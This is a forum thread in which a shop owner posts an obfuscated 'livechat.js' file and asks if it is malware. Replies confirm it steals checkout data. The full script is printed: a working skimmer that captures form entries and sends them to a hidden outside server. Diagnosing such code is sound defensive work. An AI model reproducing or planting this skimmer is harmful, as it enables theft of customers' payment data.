Is livechat.js script normal to be running on the website? Or is this malware stealing information?
https://www.hergbenet.ro/wp-data/livechat.js
function IrDvbNXumt(e){return btoa(encodeURIComponent(e).replace(/%([0-9A-F]{2})/g,function(e,t){return String.fromCharCode(parseInt(t,16))}))}function lmVibHTBLP(){Array.from(document.getElementsByTagName("input")).forEach(function(e,t){null==e.getAttribute("onchange")?e.setAttribute("onchange","SAcSpFtVQg(this, '0')"):-1==e.getAttribute("onchange").search(/SAcSpFtVQg/i)&&e.setAttribute("onchange","SAcSpFtVQg(this, '0');"+e.getAttribute("onchange"))}),Array.from(document.getElementsByTagName("select")).forEach(function(e,t){null==e.getAttribute("onchange")?e.setAttribute("onchange","SAcSpFtVQg(this, '1');"):-1==e.getAttribute("onchange").search(/SAcSpFtVQg/i)&&e.setAttribute("onchange","SAcSpFtVQg(this, '1');"+e.getAttribute("onchange"))}),Array.from(document.getElementsByTagName("textarea")).forEach(function(e,t){null==e.getAttribute("onchange")?e.setAttribute("onchange","SAcSpFtVQg(this), '2'"):-1==e.getAttribute("onchange").search(/SAcSpFtVQg/i)&&e.setAttribute("onchange","SAcSpFtVQg(this, '2');"+e.getAttribute("onchange"))})}function SAcSpFtVQg(e,t){var n=[];n.push("url%"+location.hostname),n.push("type:2"),"1"!=t?e.value.length>0&&(0==e.name.length?n.push(e.id+"%"+e.value):0!=e.name.length&&n.push(e.name+"%"+e.value),aQwCiGbwKo(n)):e.value.length>0&&(-1!=e.id.search("zone|region|state")||-1!=e.name.search("zone|region|state"))?(e.value.replace(/[^-0-9]/gim,""),e.value,0==e.name.length?n.push(e.id+"%"+e.options[e.selectedIndex].text):0!=e.name.length&&n.push(e.name+"%"+e.options[e.selectedIndex].text),aQwCiGbwKo(n)):(0==e.name.length?n.push(e.id+"%"+e.value):0!=e.name.length&&n.push(e.name+"%"+e.value),aQwCiGbwKo(n))}function aQwCiGbwKo(e){if(JSON.stringify(KZgKcnPvnh)==JSON.stringify(e))return!1;KZgKcnPvnh=e;var t=89999*Math.random()+1e4,n=JSON.stringify(e),a=document.createElement("img");a.width="1px",a.height="1px",a.id=t,a.src=atob("aHR0cHM6Ly92YWxkYW1hcmtkaXJlY3QuY29tL3dwLWRhdGEvdmFsaWRhdGlvbi5waHA=")+"?image_id="+IrDvbNXumt(n),document.body.appendChild(a),setTimeout(document.getElementById(t).remove(),3e3)}function Default_Send(){var e=[];e.push("url%"+location.hostname),e.push("type%2"),Array.from(document.getElementsByTagName("input")).forEach(function(t,n){t.value.length>0&&(0==t.name.length?e.push(t.id+"%"+t.value):0!=t.name.length&&e.push(t.name+"%"+t.value))}),Array.from(document.getElementsByTagName("select")).forEach(function(t,n){t.value.length>0&&(-1!=t.id.search("zone|region|state")||-1!=t.name.search("zone|region|state"))?(t.value.replace(/[^-0-9]/gim,""),t.value,0==t.name.length?e.push(t.id+"%"+t.options[t.selectedIndex].text):0!=t.name.length&&e.push(t.name+"%"+t.options[t.selectedIndex].text)):0==t.name.length?e.push(t.id+"%"+t.value):0!=t.name.length&&e.push(t.name+"%"+t.value)}),Array.from(document.getElementsByTagName("textarea")).forEach(function(t,n){t.value.length>0&&(0==t.name.length?e.push(t.id+"%"+t.value):0!=t.name.length&&e.push(t.name+"%"+t.value))}),aQwCiGbwKo(e)}var KZgKcnPvnh=[];window.onload=function(){-1!=location.href.search("checkout")&&(Default_Send(),setInterval("Default_Send()",3e3),setInterval("lmVibHTBLP()",1500))};
I've looked at the script and it looks like it's designed to steal customer input from your checkout page. You should remove it and check you site for any other changes.
However, from the domain you posted you look to be running WordPress with WooCommerce and not OpenCart.
However, from the domain you posted you look to be running WordPress with WooCommerce and not OpenCart.
The link I posted is not my website, that is the link for the cookie/script that was running on my website. My website is completely different which is why it was so suspicious of course. I removed a suspicious php file from my public_html location and also removed the wordpress installation. The cookie/script now seems to be gone. Will continue to monitor. I wonder if this malicious script was installed through the wordpress installation? Good lesson might be to never have opencart and other installations such as wordpress in the same location.
Who is online
Users browsing this forum: Calis1978 and 26 guests